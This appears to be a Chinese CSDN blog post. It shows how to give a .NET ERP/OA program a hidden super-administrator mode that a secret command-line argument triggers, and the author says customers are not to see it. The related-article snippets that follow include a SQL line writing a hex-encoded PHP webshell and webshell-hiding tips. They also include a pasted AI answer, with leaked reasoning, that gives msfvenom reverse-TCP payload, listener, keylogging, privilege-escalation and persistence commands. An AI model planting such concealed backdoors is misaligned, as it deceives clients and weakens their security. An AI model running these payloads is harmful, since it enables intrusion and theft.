我是这样给自己程序留的“后门”

最新推荐文章于 2022-12-08 10:04:30 发布
原创 最新推荐文章于 2022-12-08 10:04:30 发布 · 9.5k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#源代码 #应用程序 #笔记 #.net

本文介绍了一种在.NET程序中实现后门的方法,通过在启动参数中传递特定字符以触发超级管理员模式,避免了直接使用预设账号带来的安全隐患。
    做一些ERP软件或者OA 又或者CRM 的时候 总需要给自己留个“后门”   这个后门 只是方便部署之后DEBUG。 相信大家也都明白!


   案例      .NET程序  某仓库管理软件。。
   环境:    因为公司项目问题,发现了一个问题。我们公司某OA程序  在部署之后会有一个有一个DEBUG的功能,本身这是一很NB的想法,不过 在实现的过程中出现了一个BUG!
   程序默认了一个 最大权限用户 Sys*** 木哦人口令 888*** (咳咳 别乱猜,不是你们想的那样。)这个账号拥有比系统管理员更高权限(主要是方便 我们为客户DEBUG)!但是,采用登录的办法  总觉得欠妥。一旦个别客户 捣乱,那个。。咳咳。。

    针对方法:

   static class Program
    {
        /// <summary>
        /// 应用程序的主入口点。
        /// </summary>
        [STAThread]
        static void Main(string[] str)  //这里多了一个参数
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);

            Application.Run(new Form1(str));//这里传递 参数
        }
    }
默认源代码应该是这样:
   static class Program
    {
        /// <summary>
        /// 应用程序的主入口点。  // 默认建立程序是这样的!
        /// </summary>
        [STAThread]
        static void Main()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);

            Application.Run(new Form1());
        }
    }
OK 
      Form1的构造函数里面 

   	 public string msg = "";
        public Form1(string[] str)  // 这里添加了一个参数。 主要是 前面匿名类生成的时候 我们手动写了一个参数 这里做接受
        {
            InitializeComponent();
            foreach (string i in str)
            {
                if (i == "A")
                {
                    msg = "超级管理员";
                }
            }
        }
默认的是这样的
  	public Form1()  
        {
            InitializeComponent();
            
        }


在From_Load 时间后 我们尝试一下 MessageBox.Show(); 一下!
猜想 如果 有A 这个字符 那么就会弹出超级管理员! 至于权限模块 大家按照自己的方法来做。
那如何调用呢? 
双击 运行程序 OK! 如何以“后门”的形式打开呢? CMD 程序目录 XX.EXE - A OK了。。(当然这个过程 是不能让客户看见的!需要封装)
其实这里只是运用了一个 窗体程序运行 参数传递。但是以这种形式 效果明显比 在登录的时候 输入咋们事先写好的后门账号来 要保险 和高端的多!
------------------------------------------------
以上过程 纯属是一个思路。大家不喜勿喷。
通达OA应对后门检测的临时方法
qq_40041974的博客
08-31 3271
麦枫网如何做到对官方后门的全面清理的。随着版本的不断更新,通达OA系统目前文件包 里有几万个文件,每个文件都有可能设置后门、木马代码,只有通过对每个文件都进行检 查才知道该文件是否有后门。仅仅从工作量上来说,就相当费时费力,清理后门代码,除 了反编译或逆向分析 EXE、DLL 文件外,还必须全部解密官方的所有网页文件代码,才可以做到逐个文件清查后门的工作,而且,文件解密后的查马工作、代码纠错的工作量也相 当庞大,技术力量薄弱的团队很难做到 100%解密而又无代码错误的,能够做到 100%全解 密的等同拥有通
知乎高赞:我故意在代码里后门,违法吗?
weixin_68789096的博客
01-29 1412
昨天我在逛知乎的时候,看到了这么一个问题:我看到了三个非常有意思的回答,分享给大家一看。首先是这个为了防止项目交付后收不到尾款埋下后门的回答:答主:特立独行的猪链接:https://www.zhihu.com/question/531724027/answer/2487270093编辑:编程技术宇宙早年给某台企做外包项目,定制一个Android系统的ROM。开发费用16万,一年期维护费用2万。开发费用分三期打款,订金4万,生产环境ROM交付8万,验收并交付源码后打尾款4万。
为自己给操作系统后门?我的安全管理经验谈
weixin_33721427的博客
07-02 340
大家可能看到这个题目,以为我是要做坏事,其实坏事的对立面就是好事,根据一些博客论坛的帖子加上自己的一些经验之谈,把具体的一些见解分享给大家,对于复杂一些的给予详细步骤,简单的一笔带过。前提是这台电脑必须是你以前管理的,并且知道administrator权限,权当是技术交流,让51CTO网友了解系统更多的安全设定,以防患于未然。相信你做了以下步骤,总会有人想不...
Node.JS实战35:给程序一个“后门”。
w2sft的博客
01-17 1170
本文讲的技巧性知识,有很多正面、合理的应用场景。 先看代码: var express = require('express'); var app = express(); //内置中间件,静态文件访问 app.use(express.static('./')) //监听 var server = app.listen(8000, function () { var host =...
后门程序技术知识全面深解
www.i201314.net
05-23 3674
什么是后门程序   后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。   后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还 能挫败系统上各种增强的安全设置。   后门是一种登录系统的方法,它不仅绕过系统已有的安全设置,而且还能挫败
php如何后门,ThinkPHP后门技巧
weixin_35451402的博客
03-28 1239
欢迎来到阿八个人博客网站。本阿八个人博客网站提供最新的站长新闻,各种互联网资讯。喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!URL链接:https://www.abboke.com/rz/2019/1010/116721.html90sec上有人问,我说了还有小白不会用。去年我审计TP的时候意到的,干脆分析一下代码和操作过程。thinkphp的I函数,是其处理输入的函数,一般...
精选资源
渗透测试模拟实战——暴力破解、写入ssh公钥后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
精选资源
渗透测试模拟实战——暴力破解、定时任务后门与shift粘贴键后门、植入WaKuang程序(对应靶场和wakuang样本)
03-24
渗透测试模拟实战——暴力破解、定时任务后门与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)对应的靶场和wakuang样本,参考教程链接:...
年会抽奖小程序 html+js 后门设置 hrblive-lottery(后门版)V1.3.zip
01-16
公司年会抽奖小程序 html+javascript源代码 后门设置指定中奖 排除设置指定不中奖 自定义皮肤 请运行在google chrome浏览器或火狐浏览器下 按键盘空格键或者字母A可进行抽取,隐藏菜单请按ESC。 建议每组选出10个...
给自己的软件添加后门
01-07
本文将详细探讨如何使用C#.NET语言给自己的软件添加后门,特别是通过键盘输入序列(按键后门)实现这一目标。 首先,我们要了解后门的基本概念。后门并不全然是恶意的,它可以是开发者为了方便测试、调试或者在客户...
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
本文将深入探讨PHP隐形一句话后门及其与ThinkPHP框架加密码程序的关系,特别是涉及的`base64_decode`函数的危险性。隐形一句话后门是黑客植入Web应用中的隐蔽代码,通常用于远程控制和恶意活动。这种后门很难被检测...
MSF给正常程序添加后门
永远是少年
06-10 1793
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
mysql 提权_Mysql提权后门
weixin_33532301的博客
01-18 252
记录一次关于无聊时对基友MYSQL服务器的提权攻击。尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。0x01.从无聊的nmap扫描开始今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。...
如何更简单的你的webshell后门
denseryan专栏
07-01 612
得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了! 所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的,! 1.下面教一种很菜的方法,ASP插入法,不容易被发现~  在我们要做手脚的ASP文件里加入如下内容 *********************** 在***********处加入你的shell代码 就可以了
程序员后门,怎么能管它叫热部署呢?
Java_LingFeng的博客
12-08 1078
这篇文章给大家分享一个热部署相关的知识点。 这可是一个好东西啊,当年在学习学 JSP 的时候,哐哐哐一顿操作,发现服务没重启,我在 JSP 里面写的东西就直接生效了。 当场我就是一个大大的震惊,而旁边教我的人只是说着一些什么热部署,字节码,classloader 重写之类的我根本就听不懂的话。 但是听不懂不重要,我会使用就行了。随即就是一顿疯狂练习,把这玩意用的炉火纯青,什么 pageContext 上下文,redirect 重定向,forward 转发,九大内置对象,完整的生命周期啥的,手到擒来。
我今天终于知道后门在代码上是如何实现的
wjp_116的专栏
03-23 5609
我们开发程序是要在生产一线使用的,这种软件不但要考虑功能,还要考虑到使用者的知识水平和个人素质。总有人喜欢不按规程操作,把这些问题交给管理者去规范是个很挠头的事情。这样只能在代码上进行处理了。比如不能在通信过程中退出程序,否则会造成通信数据的不完整性。而如果有时我们的程序有问题时又确实要在那种情况下退出,这样就需要在代码中增加一部分,只有点击了特定的按钮顺序才能退出程序。当然这部分代码是在我们技
mysql 数据库后门,运用Mysql语句生成后门木马的具体方法
weixin_35460054的博客
03-17 950
通过Mysql 的语句生成后门木马的方法:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mys...
LINUX后门--教程(三)—— 一款短小精致的perl脚本SSH后门
W小哥
06-04 1703
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会后门,如果你连这种后门方法都不会,怎么去应急? 不知攻,焉知防 二、SSH后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 环境: 靶机(kali):192.168.160.130 攻击机(centos8):192.168.160.131 2.1 perl脚本SSH后门介绍: 这个ssh 后门伪装成一个perl脚本,名为sshd,位于/usr/sbin/sshd , 将系统原先的ss
meterperter后门
最新发布
03-20
<think>好的,用户想了解Meterpreter后门技术的实现原理和使用方法。首先,我需要回顾Meterpreter的基础知识。Meterpreter是Metasploit框架中的一个高级负载,主要用于渗透测试。它采用内存注入技术,运行在目标系统的内存中,不下磁盘文件,这有助于绕过传统的杀毒软件检测[^1]。 接下来,用户可能需要了解具体的实现原理。Meterpreter通过生成可执行文件或脚本,利用漏洞在目标系统上执行代码,建立反向TCP连接。例如,使用msfvenom生成恶意负载,然后通过社会工程学手段诱导用户执行,从而建立会话。此外,迁移进程的功能也很重要,可以提升后门的持久性[^3]。 关于使用方法,用户可能需要具体的步骤指导。比如,使用msfvenom生成不同类型的后门文件,设置监听模块,以及利用MSF的POST模块进行后续操作。这些步骤需要详细说明参数和配置,确保用户能正确实施。同时,要提到编码和加密技术,如shikata_ga_nai,来绕过杀毒软件[^3]。 用户还可能关心如何维持后门的持久性,比如注册表添加、计划任务等。此外,迁移进程到合法程序如explorer.exe,以避免被终止,这也是关键点之一[^3]。 最后,需要提醒用户注意法律和道德问题,强调仅在授权环境下使用这些技术。同时,结合参考文献中的后门实践和工具使用,增强回答的可靠性[^2]。 现在要确保回答结构清晰,分点说明原理和使用方法,并附上示例代码。同时生成相关问题,帮助用户进一步学习。</think>### Meterpreter后门技术解析 #### 一、实现原理 1. **内存驻技术** Meterpreter通过注入到目标系统进程内存中运行,不生成磁盘文件,有效绕过传统杀软的文件扫描机制。其通信采用加密信道,支持TCP/HTTP/HTTPS等协议。 2. **模块化扩展机制** 通过动态加载DLL模块实现功能扩展(如键盘记录、屏幕捕获),核心代码仅保基础通信功能,降低内存占用[^3]。 3. **反向连接控制** 典型工作流程: ```bash 目标机器执行后门 → 主动连接攻击者控制端 → 建立加密通信隧道 → 发送系统权限信息 ``` 这种反向连接方式可绕过目标网络出站限制。 4. **会话迁移技术** 支持通过`migrate`命令将进程注入到稳定系统进程(如`explorer.exe`),避免因原进程终止导致会话断开。 #### 二、使用方法 1. **生成后门程序** 使用msfvenom创建载荷(示例生成Windows可执行文件): ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o backdoor.exe ``` - `-p`指定载荷类型 - `LHOST`为控制端IP - `LPORT`为监听端口 - `-e x86/shikata_ga_nai`可添加编码混淆 2. **启动监听模块** ```bash msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit ``` 3. **后门功能操作示例** - 获取系统信息:`sysinfo` - 屏幕截图:`screenshot` - 键盘记录:`keyscan_start` - 文件上传:`upload /local/file C:\\target\\path` - 权限提升:`getsystem` 4. **维持持久化** ```bash run persistence -U -i 5 -p 443 -r 192.168.1.10 ``` - `-U`:用户登录时自启动 - `-i`:重连间隔(秒) - 自动创建注册表启动项 #### 三、防御建议 1. 使用行为分析型杀毒软件检测内存注入 2. 监控异常网络连接(尤其是反向TCP连接) 3. 定期检查系统注册表启动项和计划任务 4. 对敏感进程(如explorer.exe)进行内存保护 ```bash # 检测示例(Windows) netstat -ano | findstr "ESTABLISHED" # 查看异常连接 tasklist /svc # 分析进程关联服务 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值